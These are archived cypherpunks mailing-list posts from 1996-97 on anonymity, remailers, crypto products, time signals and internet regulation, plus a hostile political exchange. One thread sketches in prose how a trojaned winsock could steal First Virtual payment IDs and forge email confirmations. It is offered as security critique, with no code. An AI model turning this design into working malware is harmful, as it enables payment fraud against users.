> is being affected is _mail_, not anonymous speech in public fora (though
> restrictions on that may be tried, too). That is, that the _content_ of a
> package, a la the Postal Service I.D. situation, is not at issue, only the
> valid identification of point of origin.
> 

And the civil libertarians ought to reply that email is like _mail_ in
name only.

>
... more snip ....

> --Tim May
> 
> 
> 
> 
> 
> Just say "No" to "Big Brother Inside"
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1398269     | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 

- --------------------
Scott V. McGuire <svmcguir@syr.edu>
PGP key available at http://web.syr.edu/~svmcguir
Key fingerprint = 86 B1 10 3F 4E 48 75 0E  96 9B 1E 52 8B B1 26 05



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMQ3Kdt7xoXfnt4lpAQFCDwP/T95pprHGaq/KkFXe4YT1yBLIo5HL8po4
f20LIRJmP45Pp5x3zp/SSW8wOd+9DsQxkvNau7jOJrk0a4jmaqI/uzgbjkefIjwg
nAzEiQmnIC7wWeiTP0SsZrcdt34sVkwHERmu2nvttd3y5VAfS+rIb716dsnuGtWF
TY/geMGRrd8=
=RK96
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: atb@purple.reddesign.com (Angooki Taipu)
Date: Wed, 29 Jan 1997 18:38:34 -0800 (PST)
To: sameer@c2.net
Subject: Re: Cats Out of Bags
Message-ID: <v02130500ad33332cb5db@[204.179.134.109]>
MIME-Version: 1.0
Content-Type: text/plain


 >       David Aaron seems to make lying out of his ass a hobby. His
 >talk at the RSA conference was such a load of bullshit it wasn't even
 >funny.

 >       "Other governments were upset with the 56-bit export
 >allowance. They said it was going to undermine their national
 >security."

I'm sure a few countries are upset because the US policy may in some way
impede their citizens ability to adopt STRONG cryptography and secure their
information infrastructure, thus injuring their national security.

Remember, Aaron is employee of the government.  He talks in doublespeak,


Angooki Taipu
atb@purple.reddesign.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjb@aiinc.com (Michael Bailey)
Date: Sun, 26 Jan 1997 11:07:00 -0800 (PST)
To: <DataETRsch@aol.com>
Subject: Re: If you were unable to download UDCM V2.0 before....
Message-ID: <19970126185911908.AAA188@mjb>
MIME-Version: 1.0
Content-Type: text/plain


Yes that would be cool so i could test it out against my decompiler that
seems to do great agains encrypted txt. With the realease of the usa policy
on encryption do you all think that the 160 level will be increased or will
they make new standards.

----------
> From: ichudov@algebra.com
> To: DataETRsch@aol.com
> Cc: cypherpunks@toad.com
> Subject: Re: If you were unable to download UDCM V2.0 before....
> Date: Thursday, January 23, 1997 8:06 PM
> 
> Mr. Ramos, 
> 
> 
> You promised to release the algorithm of your program as well as
> crypto-relevant source code. You promised to do it atfer a month, and
> the time has come. We are eagerly awaiting the promised code.
> 
> Thank you so much for your openness.
> 
> igor
> 
> DataETRsch@aol.com wrote:
> > 
> > {If you were unable to download UDCM V2.0 before, we're extremely
sorry.}
> > {UDCM's web site may have been under construction during the time you
> > visited.}
> > {UDCM's web site has finished undergoing its changes and will operate
> > correctly.}
> > {UDCM V2.0 has been extensively modified from its previous variation.}
> > {Digital signaturing and public key cryptosystem capabilities have been
> > added.}
> > {UDCM's DS and PKCS techniques do NOT make use of conventional PN
factoring.}
> > {UDCM's source code is currently unavailable. PLEASE DO NOT REQUEST
IT.}
> > {UDCM's on-line help documentation has also been extensively modified.}
> > {This advertisement has also been modified.}
> > 
> > Hello,
> > 
> > Greetings! I am Jeremy K. Yu-Ramos, president of DataET Research, Data
> > Engineering Technologies. I am sending you this message to let you know
that
> > DataET Research has recently initiated the distribution of UDCM,
Universal
> > Data Cryptography Module. UDCM implements a revolutionarily new,
extremely
> > advanced and sophisticated, digital data encryption algorithm named
IMDMP,
> > Integrated Mathematical Data Manipulation and Positioning.
> > 
> > UDCM (the IMDMP algorithm)...
> > 
> > o Is a royalty-free Windows DLL module featuring advanced cryptography.
> > o Contains more than 150 procedures and functions.
> > o Is a very cost-effective size of only 60 kilobytes.
> > o Implements the IMDMP encryption algorithm.
> > o Allows encryption keys as large as 2048 bits.
> > o Includes 18 sub-algorithms.
> > o Processes all forms of binary and ASCII files.
> > o Allows multiple encryption layer levels.
> > o Has absolutely no back-doors or magical keys.
> > o Includes time and date locking features. 
> > o Includes file specific unique encryption features.
> > o Includes file authentication guard features.
> > o Includes digital signaturing capabilities.
> > o Implements the public key cryptosystem method of security.
> > o Includes data importance and sensitivity stamping features.
> > 
> > UDCM, being a Windows DLL module, can be accessed through programs
developed
> > with popular application and database programming languages and
environments
> > such as: C, C++, Visual Basic, PowerBuilder, Delphi, OOP Pascal, Turbo
> > Pascal, dBase, Paradox, Access, Sybase, Oracle, etc. 
> > 
> > DataET Research has released a shareware version of UDCM named UDCM
V2.0.
> > 
> > To download UDCM V2.0 for free, please go to:
> > http://members.aol.com/dataetrsch/udcm.html.
> > 
> > I hope you will consider applying UDCM in the software you develop.
Thank-you
> > very much for your time.
> > 
> > Sincerely,
> > 
> > Jeremy K.Yu-Ramos
> > President
> > DataET Research
> > Data Engineering Technologies
> > 
> 
> 
> 
> 	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Thu, 24 Oct 1996 20:58:53 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Stopping the buying of candidates
Message-ID: <199610250358.WAA11949@earth.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 01:40 PM 10/24/96 +0000, Matthew J. Miszewski wrote:
> >This is my last reply.  I guess I forgot your overarching theory. 
> >Reality, nah.
> 
> "My last reply"?  Sorta the rhetorical equivalent of "I think I heard my 
> mommy calling," huh?

Yes Jim, your sparkling wit and incredibly convincing argument has 
made me run for cover.  Remind everyone what your "solution" is 
again.  In case everyone hasn't already *PLONK*ed you.

++++==============----------------------------
Matthew J. Miszewski |The information revolution has changed wealth: 
		     |intellectual capital is now far more important 
mjmiski@execpc.com   |than money.		-Walter Wriston
                         ----------------------------==============++++




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Fri, 25 Oct 1996 12:53:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Secure Ware (HannaH)
Message-ID: <199610251936.OAA15464@earth.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


I am looking for any critical information on a security product named 
"HannaH" from a company called Secure Ware.  If there is none and the 
product is worthwhile, then, great.  But I need to know if it is 
smoke and mirrors from an independant source.

Thanks in Advance.

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Fri, 25 Oct 1996 14:57:16 -0700 (PDT)
To: jimbell@pacifier.com>
Subject: Re: Stopping the buying of candidates
Message-ID: <199610252156.QAA19055@earth.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


I apologize to the list for this last post by Murder, Inc.  My last 
piece of mail was sent privately to Mr. Bell.  He apparently thinks 
it proper to quote private mail in public.  Whatever.

> >I wanted to take this crypto-irrelevant discussion off the list.
> 
> If you think the applications for the use of cryptographic blinding 
> techniques is "crypto-irrelevant" then you're even more clueless than I'd 
> previously surmised.  See Chaum's article of August 1992 if you doubt this.

What exactly are your credentials.  Your reputation, of course, 
precedes you.  Given that I should have stopped this idiocy a long 
time ago.

> The money will eventually be spendable.  But information as to the number 
> and timing and size of the donations will be disguised using blinding 
> techniques.  Re-read my comments.

Explain, please, how you would budget in this situation.  Oh, I 
forgot, when the world realizes that Jim is right, everyone will 
learn to live their lives like Jim.

> Nobody said politics had to be easy.  They'll adjust to the new reality; 
> they always do.

see above.

> >My point is, Jim, that your idea is unworkable in reality. 
> 
> Since you obviously don't understand it, and you also don't understand 
> cryptographic blinding, why should anybody pay attention to your opinion?

Hmmm.  How long have you been on the list?  What is it I don't 
understand, specifically.  And in private e-mail.

> > In theory it would be nice to have complete anonymity.  In reality it won't 
> >work.
> 
> Always overstating your case, I see.  For the application I described, it 
> isn't necessary to have "complete anonymity."  What's needed is a healthy 
> dose of fog and uncertainty, making sure that the candidates can't trust any 
> claim that a donor has made a donation of any particular size.

Explain to me how many campaigns you have run.  Explain to me at 
least a paper you have written (I dont particularly care if you do or 
dont have a degree, my opinions are based upon your ability to assert 
and defend a thesis).   How many people support your ideas?  The 
revolt must be stealth.  Yeah, that's it.

> Since today's campaign contribution limits seem to be inherently a violation 
> of freedom of speech, why not embrace my solution, which doesn't do this?

You are right, they do.   In your world, there must be only two 
solutions.  Jim's way or the current way.  Or better yet, just spout 
off.

> "Constitutionalist"?  Hell no!  I subscribe to the idea inherent in the 
> joke, "The Constitution may be bad government, but it's better than what we 
> have now."  I think there's no doubt that a government based scrupulously on 
> the US Constitution would be a vast improvement.  However, we've never had 
> such a thing.

What is your alternative, Jim.  Oh yeah, kill all the politicians.  
Look to the archives folks.  **PLONK**

> Such "proof" will be easily faked, BTW, which is part of the reason this 
> system will work so well.  I could go to some candidate and claim that I'd 
> made a $10,000 contribution to his campaign.  

Jim, how many politicians do you have regular contact with.  There 
were CongressCritters at my wedding, but you know what?  If I told 
them I just made $10,000 donation to their campaign they would not 
believe me.  You know what else?  You couldn't get close.  Every 
office on the hill knows of the resident nuts.  Its the essence of a 
killfile, nuts are handed off to the intern.  The players are known.  
I don't particularly care if you believe me.  Again what is your 
experience?

> Let's say I'd show him a 
> (forged) cancelled check.  What could he do about it?  Would he risk pissing 
> off a valuable contributor?

If he has already raised 100's of thousands of dollars before, he 
would have no need to deal with you at all.  Especially since, I 
assume from your prior statements that you would get rid of 
contribution limits.

> Sure about that?  Let me provide some contrary evidence.  Every once in a 
> while, you'll see on the TV networks a report about corporate (and labor, 
> BTW) campaign giving, and they will occasionally point out that a given 
> corporation (or PAC, etc.) gives money BOTH to the Republicans and the 
> Democrats.  They have no reason to do this, except that they think they will 
> get some benefit in the future from the "access" that contribution produces. 

Corporate donations?  Look it up.  Yep, they do.  And after you blind 
the donations, the access will continue to be bought.  Politicians 
can use laws of probability to figure out who has, will and will in 
the future donate.  They can also eliminate a whole bunch of folks.

> not the opponents.  If they thought it necessary, they would lie about 
> making a contribution to the other candidate.

How many lobbyists do you know Jim?  

> >Let me ask you this.  Do you enjoy the net of today (AOL, Spam, 
> >XXX-rated transfers bogging down traffic)
> 
> Why should I mind the particular characteristics ("XXX-rated transfers") of 
> the traffic jams?  What are you, some kind of Born-again christian or 
> something?   And while I don't like the spam, either, I am under no illusion 

Did you protest the COS crap?  Well shit Jim, I dont care about the 
content.  Nevermind.

> It sounds like you're making a contradition.  Previously, you suggested that 
> a privatized system wouldn't work, but at the end of the last paragraph you 
> seem to be saying that the blame falls on "the legislature"'s doing 
> something wrong.

Hmm.  Blame and workability.  What is the connection.  Maybe we can 
all take up a collection so that Jim can go to logic class.

> And if you object to being rooked in a company's bankruptcy, complain to the 
> government who makes itself a preferred creditor  in almost all circumstances.

I thought we couldnt complain to the Governement?  Jeez. Jim, your 
confusing me.  God I must be dumb.  Or maybe you are really writing 
in a style that can easily be decrypted to mean something else.  
Yeah, Jim, that's it.

> If it's "perfectly legal" yet "inherently unfair," it sounds like much of 
> the blame lies with the legislature, since it is the legislature that is 
> responsible for the laws.  Huh?

Blame, workability, its like trying to teach a student with no brain.

> >Try looking at election results. 
> 
> You still haven't proven your case.

How many times do I have to explain probability to you?  Jesus, look 
it up.  

> You are coming to conclusions without support.  As I said before, you've 
> convinced yourself that you KNOW that a particular election went a 
> particular way precisely because of "public employees."  Sigh!  

See above.  Oh yeah, uh, Jim, you can use that nifty scroll button,

> >Actually, in my small city, with under 2000 active voters, it is 
> >fairly easy to discern the number one identifiable group.  I DONT 
> >deal in theory.  I deal in reality, you should try it.  While your 
> >theories are enticing they are TOTALLY without the ability to be 
> >realized.
> 
> You STILL aren't supporting your claims!

Probability.  Anyone want to send him a Statistics Textbook?

> >Politics deals with probability not certainty.  If you had ANY real 
> >world experience you would know that.  Budgets are all dependant upon 
> >reasonable probabilities.  Its really not that hard to grasp.
> 
> How much longer do you intend to waste my time?  

Oh, Im sorry.  You must be planning on taking over the world.  Oh 
yeah, I heard all of your friends jumping to your support.  All of 
the political ties you made with all of your experience are jumping 
to your aid.  

I hear only one solitary sound.  ***PLONK***

> 
> 
> Jim Bell
> jimbell@pacifier.com
> 
> 
++++==============----------------------------
Matthew J. Miszewski |The information revolution has changed wealth: 
		     |intellectual capital is now far more important 
mjmiski@execpc.com   |than money.		-Walter Wriston
                         ----------------------------==============++++




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Mon, 28 Oct 1996 20:09:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Lawyers, companies to create Internet legal group
Message-ID: <199610290408.WAA25302@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a great example of why we need organized people like Greg to 
help express an alternative viewpoint.  As Greg and myself, and the other 
lawyers on this list know, there are often multiple sides to any 
legal argument.  To have this be the only voice regarding Law and the 
Net would be a bad idea.

I do favor its general intent - to take the formation of policy out 
of the legislative venue.  I do not think the major interests listed 
will have my interests at heart.  Mom and Pop ISPs, Web Consultants, 
the HTML Guild, the ideas of GPL may not even be in the consciousness 
of some of the larger organizations (I remain to keep my hope out for 
Netscape).

I would like to propose a professional response to this organization 
in the form of a Law Review type of organization.  I know there are 
enough lawyers on the list to set this into motion.  I would like to 
know what kind of interest there would be before I put the great deal 
of effort it would take into such a project.

Let me know.

Matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Thu, 1 Feb 1996 13:33:13 +0800
To: cypherpunks@toad.com
Subject: Nautilus?
Message-ID: <9602010508.AB18106@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi.

I was wondering if some of you ever used Nautilus, if it was 
good, if it has a backdoor, etc.

I am not knowledgeable enough to inspect source by myself.

Any comments?

Since the topic was probably discussed extensively, feel free 
to reply to me directly.

Regards to all cyphering punks!

JFA
Why, you might wonder, is it that civil servants never look out 
through the window in the morning?  What would they otherwise 
occupy themselves with in the afternoon?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Feb 1996 15:12:10 +0800
To: cypherpunks@toad.com
Subject: Questions about Anonymity, and the FAQ
Message-ID: <ad35a2cd03021004b14b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:00 AM 2/1/96, Anonymous wrote:
>Are anon remailers the only way to send anon email without giving up the
>source eventhough an organization has a wealth of dough/technology and
>several class B addresses?  Couldn't they just trick their mail servers or
>would a nslookup/whois defeat that?

"Trick the mail servers" is not a cryptographically strong approach...it is
just a variant of "security through obscurity." In terms of "work factor"
(a measure of the number of bits of protection, and thus the amount of work
an opponent has to undertake), the various "Port 25" sorts of hacks are
ridiculously easy to break. Maybe not for everyone (for example, moi would
have no idea how to break it!), but for determined and knowledgeable
adversaries, easily breakable.

The Chaumian mix, semi-realized in Cypherpunks-style remailers, are the
best hope for cryptographic security.

>And are nym accounts the only way to receive email without giving up who
>the intended recipient of tha mail/news post actually is?

No, public message pools are an easy way to do this--it's what I used for
my BlackNet experiment. Tell your sender to encrypt to the public key you
provide--which isn't your key you usually associate with your true
name!--and to post the resulting cyphertext in, say,
alt.anonymous.messages. Since only you can read it, but no one knows who is
reading the messages in alt.anonymous.messages, the implications are clear.

I address many of these issues in my Cyphernomicon FAQ, available in
various ways, including the Web URL of
"http://www.oberlin.edu/~brchkind/cyphernomicon/".


--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 1 Feb 1996 22:27:27 +0800
To: JR@ns.cnb.uam.es
Subject: Re: Time codes for PCs (fromn German Banking)
Message-ID: <m0thuEN-0008zjC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:42 PM 1/29/96 +0100, JR@ROCK.CNB.UAM.ES wrote:
>From:	SMTP%"jimbell@pacifier.com" 27-JAN-1996 03:43:05.83
>
>>A peripheral I've long wanted to see, commonly available:  ACCURATE  time, 
>>broadcast to the millisecond/microsecond/nanosecond, available from sources 
>>as varied as TV VIR's, FM subcarriers, and other sources, available as an 
>>easy input (via a peripheral card) to a computer.
>>
>	Yup! Do you think it is really possible? If I remember well
>speed of light is 300.000 Km/s. That means that light takes around
>1 ms. to cover 300 Km. If you use a satellite, antenna, whatever
>to broadcast a timing signal, the accuracy will depend on when
>do you receive it, and that in turn on your distance from the
>source.

<sigh!>  I am well aware of the facts you indicate, and many more of which
you aren't even aware.  But one of the functions (in fact, the basic,
intended one) of GPS is to locate, as precisely as possible, the exact
location of the receiver.  Thus, time delays can be compensated to the
accuracy of the location fix, at the very least.  If we assume 100 meters
error, max, that's about 300 nsec error.  (GPS receivers AUTOMATICALLY
compensate for such delays!)


>>I have a 12-year-old Heathkit "Most Accurate Clock" that I assembled myself, 
>>and had the foresight to install it with its computer  interface option. 
>>(receives 5, 10, or 15 MHz signals broadcast from Boulder, Colorado, 
>>containing "exact" time.) 
>>
>	Just remember that the best you can get would be microseconds if
>you're in a 300 meter radius, or milliseconds on a 300 Km. And possibly
>nanoseconds at 0.3 m.

Well, this clock doesn't pretend to be better than about 5-10 milliseconds
even in signal-locked condition.  However, there is a dipswitch on the
bottom of the unit, settable in 500 mile increments, from Boulder, Colorado.
500 miles corresponds to 3 milliseconds.  Clearly this was a good device
when made, but has obviously been supplanted by at least a factor of 1000 by
GPS.


>	Then remains the cypherpunk part on all this: how can you
>trust the *signal* your receptor receives? How do you know no one is
>interferring it or sending an inaccurate or false one?

Simple answer:  You don't.  More complicated answer:  Most such devices
don't merely input the time signal, but they use an accurate internal clock
to maintain good time when signals go away.  In fact, the best units
"discipline" the local oscillator, either actually changing its frequency or
at least following its errors over time.  The result is that sudden errors
would be noticed.  A good TCXO is stable to well better than 1 ppm.


>	And that on a broadcast system. A system owned by someone who
>you may not trust (say a private TV channel, radio or satellite). So
>you may want to have several sources, and to be able to verify that
>the signals you receive all come from their respective sources.

Well, since "everybody" in one locale can receive a particular (local) TV
channel, one solution might be to compare time with respect to the beginning
of a particular scan line..  You may not trust the signal, but you know its
a signal that "everybody" receives.  There may be no other provision for
adding time to it, but a relatively low accuracy crystal oscillator could
identify particular frames, etc.


>	Yum! a nice problem to think about. One factor is that you
>wouldn't expect changes in public sources used by sensible systems
>since those could not pass unnoticed and might raise big protests.
>But you still have the MITM attack to consider...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Fri, 2 Feb 1996 05:43:43 +0800
To: cypherpunks@toad.com
Subject: DSN
Message-ID: <Pine.LNX.3.91.960201004027.25345A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Anyone heard of DSN? I think thats the right order of the initials...
... its supposedly the only crypto-hardware solution for protecting an 
entire network on the Internet. You put one of these $5,000 units at one 
end of a lan, and another one somewhere else on the Internet, and the 
company gaurantees secure, encrypted transmissions. The TCP/IP headers 
and data are mangled, encrypted, etc.

It uses 512bit keys and I was just wondering how the authentication is
done. Does anyone have any specs on these units? Supposedly it does not
require a 3rd party entity to verify that the two units are both valid,
when determining the initial public/key pairs. Perhaps there is hardcoded
data in the units that is used to verify this? The company supposedly has 
some proprierty method ... how can we be sure this expensive unit can do 
its job if information on the encryption has not been released. 

Is there any freeware software solution that has been put through more of
a torture test, and proven to work? It seems to be the best approach would
be to put such a program on a server that is acting as the
gateway/firewall on each network. 

(define(RSA m e n)(list->string(u(r(s(string->list m))e n))))(define(u
a)(if(> a 0)(cons(integer->char(modulo a 256))(u(quotient a
256)))'()))(define(s a)(if (null? a)0(+(char->integer(car a))(* 256(s(cdr
a))))))(define(r a x n)(cond((= 0 x)1)((even? x)(modulo(expt(r a(/ x
2)n)2)n))(#t(modulo(* a(r a(1- x)n))n))))

           "SGI and Linux both run Motif and X11.  They both compile c++
                cleanly (using gnu g++). They're the same!"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Feb 1996 15:35:29 +0800
To: cypherpunks@toad.com
Subject: Re: France to push for international net legislation
Message-ID: <ad35ab7305021004b96a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:27 AM 2/1/96, bofur@alpha.c2.org wrote:
>According to radio reports here, the French government has just announced
>it's intention to pressure the European community to create
>international laws to control the Internet.
>
>This is in the wake of the net publication of a certain book that had
>been heavily censored in France.

I guess Declan M. won't be visting France or any of the other EU countries
any time soon!


--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Thu, 1 Feb 1996 14:13:44 +0800
To: cypherpunks@toad.com
Subject: Active processes monitoring?
Message-ID: <9602010555.AA19695@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

I'm running on a first generation 486 ISA 4meg ram Win 3.11

I use realdeal /commercial  and wipeswap.exe in an *.bat that launch Win3.11

How can I detect if another process is running on my system?

I use MEM /c in a dos window.  But is that sufficient?

Can a hidden process detect MEM loading and hide itself somehow?

Are there others applications like MEM that are not as universal?
(here, I guess that such stealth behaviour have to rely on identifying the
program being loaded, thus, a less common program has less chance of 
being fooled)

Thanks

JFA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Feb 1996 00:25:18 +0800
To: cypherpunks@toad.com
Subject: Declan appearing on "Europe's Most Wanted"
Message-ID: <ad35b1f0060210043fc3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:27 AM 2/1/96, sameer wrote:
>> I guess Declan M. won't be visting France or any of the other EU countries
>> any time soon!
>
>        That reminds me of a question--
>
>        If, for example, Germany decides that my company is in
>violation of their laws for mirroring the Zundelsite, will they send
>us a letter saying that, so we know not to go to Germany?

The Nebraska-based neo-Nazi publisher who was picked up in Denmark and
extradited to Germany pretty much knew his actions were illegal in Germany,
but I doubt (sheer speculation on my part) he had ever been formally
notified that an arrest warrant had been issued by Germany and could be
exercised in Denmark.

The situation with Declan, Sameer, Duncan, and others, is even less clear.
Things are moving much faster now that the Net is the means of
distribution. I was of course half-joking about Declan visiting Europe, but
surely France could decide to throw the book at him, and any EU country he
entered (such as Ireland, judging from his name) could hold him at their
entry point and ship him off to France to "set an example."

I suspect the U.S. never officially notified that Monterrey, Mexico alleged
drug dealer that he was wanted in the U.S., and as other kidnappings of
foreigners have shown, the U.S. feels it unnecessary to formally announce
to foreigners that they may be arrested in the U.S. (or kidnapped into the
U.S.). Thus, I strongly suspect that France will not bother to notify
Declan or Sameer or any of us that they face arrest in France (or
affiliated EU countries).

In Declan's case, I suspect France wants him for the Mitterand book and
Germany wants him for the Zundelsite mirrors. The lesser European countries
will of course follow their leads.

Seriously, Declan, I admire what you've done, but I hope you don't plan to
leave the U.S. for Europe anytime soon.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 1 Feb 1996 22:30:38 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: Flaw in Netscape rejoinder (was Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards)
In-Reply-To: <01BAEF34.AA95ECC0@ploshin.tiac.net>
Message-ID: <311088AC.2891@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein wrote:
> I should also apologize for the fact that I couldn't resist in pointing
> out lots of little problems with your proposed attack, and that I'm
> responding to your plan in the order you described it.  This means that
> we don't get to the really major flaw in your strategy towards the end,
> so what comes at first will seem like nitpicking.

  No problem.  This is how we find flaws and make systems stronger.

> Excerpts from mail.cypherpunks: 30-Jan-96 Re: FV Demonstrates Fatal F..
> Jeff Weinstein@netscape. (2739*)
> 
> > It would not be much harder than the demonstrated keyboard attack
> > to create a hacked version of winsock that would implement an
> > attack against First Virtual.  If the attacker had a list of web
> > pages that accept FV payments it would be very easy to collect
> > the ID numbers.
> 
> A list of stores?  First of all, this attack is already amazingly
> focused.  Our DLL to implement the attack on credit cards is 16K, and
> doesn't need to target any specific buyers, sellers, or programs.  The
> more complex the attack & the bigger the software, the more likely it is
> to be noticed.  But this is just a minor nit.  Read on.

  A gigabyte drive has lots of corners to hide stuff.  A list of the
top 1000 first virtual sites would not be very large.  On a windows
system it could be hidden in the c:\windows\system directory, where
a 100k file with an unintelligible name would not seem unusual.

> > There is no need to attack the large datastream
> > of keyboard input when the search can be easily narrowed.  Since
> > FV doesn't use encryption the attack could easily be implemented
> > in winsock, making it independent of any client software.
> 
> What's really funny (to me, at least) here and in a lot of other aspects
> of the cypherpunk reaction to FV is the continuing assumption that the
> choice of FV vs encryption is an either/or thing.  Combine FV's Virtual
> PIN mechanism with transport encryption and you've indiputably got
> something that's a LOT safer than just using credit cards with
> encryption, and a bit safer than our current system, too.  But I know,
> the correct focus here is FV's current system.  So read on.
> 
> At this point in your attack, you skip a step:  You don't explain how
> you correlate the FV ID to email address.  This means that your attack
> will ONLY work for systems where the user is always using the same PC to
> web browse and read his mail.  In practice, even if this is true 99% of
> the time, the remaining 1% would probably cause your attack to be
> detected pretty quickly if deployed on a large, automated scale.  But,
> for the sake of argument, let's imagine that it's true 100% of the time.
>  Read on.

  You would not send the FV ID to the "bad guys" until you saw a complete
FV transaction take place.  You remember the ID when you see it, but
only send it after seeing the e-mail verification message.

> > A version
> > that infected the win95 IP stack could be quite effective.  The list
> > of FV accepting sites would be easily obtainable via a query of
> > altavista.  Since the infected system is on the internet and has
> > to periodically send its results to the attacker, it could download
> > an updated list of FV pages at the same time.
> 
> Seems to me your "not much harder" claim is starting to break down here,
> with an automated virus spreading itself all over the net and
> downloading lists from altavista weekly.  And the amount of net traffic
> you're generating may make this attack a lot more quickly detected than
> ours.  (In fact, I imagine that if the folks at AltaVista or Lycos noted
> thousands of identical searches focused on merchants accepting First
> Virtual, they'd probably contact us, more out of concern for their own
> load management than anything else.)  But still, read on -- we're
> finally coming to the good part.

  I guess I didn't explain this well enough.  The attacker would do
a single altavista query, and then broadcast it via some existing
mechanism over the net.  Weekly postings to some low volume junk
newsgroup would do the trick.

> > Attacking the e-mail verification step of the FV system could also
> > be accomplished via a hacked winsock.  A bit of POP3 aware code
> > in the winsock could intercept the verification messages and keep
> > the e-mail client from ever seeing them.  It could automatically
> > generate "Yes" responses for all such messages.
> 
> OK, so you're only interested in POP3 mail tools?  That's wonderful, but
> there's also systems that use IMAP, systems that use raw SMTP to locally
> resident message stores, and many odder things.  There's also people who
> get their mail through AOL, Compuserve, Prodigy, etc.  There's people
> who live on a PC or Mac, but who read mail on a UNIX system (e.g. many
> Delphi and Netcom users).

  So I only get half or a third of the millions of people conducting
commerce over the internet.  If this stuff ever really takes off that
will be plenty.

> You're not going to catch all of them.  Moreover, even if you say
> "that's fine, we only need some of them", your attack is now dead in the
> water.  Why?  Because you have no way of telling, in your attack virus,
> what kind of technology is going to be used to read mail.  This means
> that your attack will inevitably, and quickly, hit some people who DO
> receive the mail.  Our fraud department will be quickly notified (when
> the user answers "fraud" to our query, a human sees it right away) and
> we'll be off to the races, collecting clues.  It will be work tracking
> it down, but we'll have a good shot in identifying the attack and
> producing a program that helps users spot it on their system (the moral
> equivalent of an anti-viral program) in less time than it would take you
> to even suspect that the attack FV outlined had taken place in the world
> of software-encrypted credit cards.

  It should be quite easy to determine what protocol a user uses to read
their mail from within winsock.  If we want to limit it to pop3 users, we
could just keep track of connections to port 110.  As noted before, if
they don't use pop we don't target them.

> Your attack would be caught by us relatively quickly because our model
> is based not on a single fail-safe piece of security software, but on
> *process* security.  The overall process is multifaceted, with many
> checks and balances.  What if, for example, I go to someone else's
> machine and use their web browser to buy something using MY First
